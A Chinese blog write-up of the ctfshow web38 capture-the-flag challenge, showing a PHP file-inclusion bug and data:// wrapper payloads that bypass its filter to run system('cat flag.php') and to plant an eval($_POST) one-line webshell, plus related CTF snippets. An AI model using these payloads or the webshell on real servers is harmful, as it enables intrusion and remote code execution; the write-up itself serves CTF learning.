ctfshow-web38(命令执行)

已于 2022-01-22 16:54:42 修改
阅读量400 收藏
点赞数
文章标签: php 开发语言 后端
于 2022-01-22 15:46:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/122638381
版权 
 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

法一:

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
或
?c=data://text/plain,<?=system('cat fla?.ph?');?>

法二:

一句话木马

?c=data://text/plain,<?= eval($_POST[shell]);?>
或
?c=data://text/plain;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4=

m0_62094846
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web-完整cms38
10-30
cms38-back-20171030cms38-back-20171030cms38-back-20171030cms38-back-20171030
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-命令执行-web38
weixin_43400535的博客
11-03 3236
ctfshow-web38 文章目录ctfshow-web38题目描述:原理:审计:方法:思路:同web38利用data为协议Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:23:36 # @email: h1x
Ctfshow web入门-web38 WP
qq_45427131的博客
05-18 298
查看源代码发现对比上一题只是多了对php的过滤,对php的过滤影响到的是data协议rce时<?php语句的构造 不过<?php system(‘ls’);?>是可以简写将php省略的 <?php system(‘ls’);> 等于 <?=system(‘ls’);?> 这是作者的一个小实验: 构造payload http://f5d8e458-5d09-4ed5-aba4-98ddda953a5b.challenge.ctf.show:8080/?c=data
CTFshow 命令执行 web38
Kradress的博客
10-30 162
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:23:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ //flag in flag.php error_reporting(0); if(
Bugku-WEB-web38
fallingskies
01-08 669
参考web36https://blog.csdn.net/qq_41209264/article/details/112257878 根据提示,布尔盲注。 但测试后发现and被过滤,只能使用异或^ 空格也被过滤 逗号被过滤,使用mid((password)from(1)for(1))代替mid((password),1,1) 等号被过滤,使用不等号<> for被过滤,使用ascii取字符串第一个字符转换为ascii码 构造如下 username=admin'^(ascii(mid
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow学习记录-web入门(命令执行29-38)
龟速更新的九某人
06-02 899
ctfshow学习记录-web入门(web29-38)
ctfshow web入门 命令执行34-38
m0_62207170的博客
03-25 495
ctfshow web入门 命令执行34-38
ctfshow-web29~38做题记录
akxnxbshai的博客
01-13 185
Web 29 题目过滤了flag,所以利用通配符来执行命令。 Payload:?c=system('tac f*'); Web 30 查看源代码 System函数不能用,可以用passthru、exec,shell_exec等函数,exec不能输出结果。 特别说一下用exec时构造?c=exec(‘cp f* 1.txt’);(将flag.php中的内容复制给1.txt) 访问1.txt,拿到flag。 Web 31 过滤条件: flag\system\php\cat\
CTFshow web37 38 39 40
ChenD的学习笔记
11-08 687
CTFshow web37 web38 web39 web40
【bugku】web38 基于布尔的SQL盲注
EC_Carrot的博客
12-25 732
题目 进去后是一个登陆界面,照常用admin登陆随便一个密码,发现说password error,在admin加上个'提示username does not exist!,再加上题目提示基于布尔的SQL盲注,猜测后端是判断username是否存在,这里可能就会有注入点。输入了and发现提示illegal character,说明有过滤。 先FUZZ测试一下发现and、+、=等许多东西都给过滤了,但是^、ascii、substr等用于盲注的函数都还在,主要的空格可以用()绕过,=可以用<>来代替
flag就在flag.php,flag就在flag.php
weixin_35355431的博客
03-11 2194
Web1题目地址1.访问题目存在一个登录界面2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示3.访问flag.php,试试可不可以得到flag提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的4.抓包发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密之后的在登录成功跳转的那个页面还有一个修改密码的...
1.30 刷题
Lumos427的博客
01-30 683
ctfshow web入门 命令执行 web37 //flag in flag.php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c); echo $flag; } }else{ highlight_file(__FILE__); } 这里用了include文件包含,代码不能直接执行
PHP渗透测试题目笔记
Zeker62的博客
02-10 5507
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
fileinclude (攻防世界web)
qq_53099119的博客
10-01 1462
接下来构造payload,使用filter伪协议来读取flag.php的源码: payload: language=php://filter/convert.base64-encode/resource=/var/www/html/flag 注意,由于在源码分析中,对lan最后拼接了“.php”,因此在payload中flag后不用加。 执行后即可获得flag的base64编码。
ctfshow-web-web红包题
07-14
如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值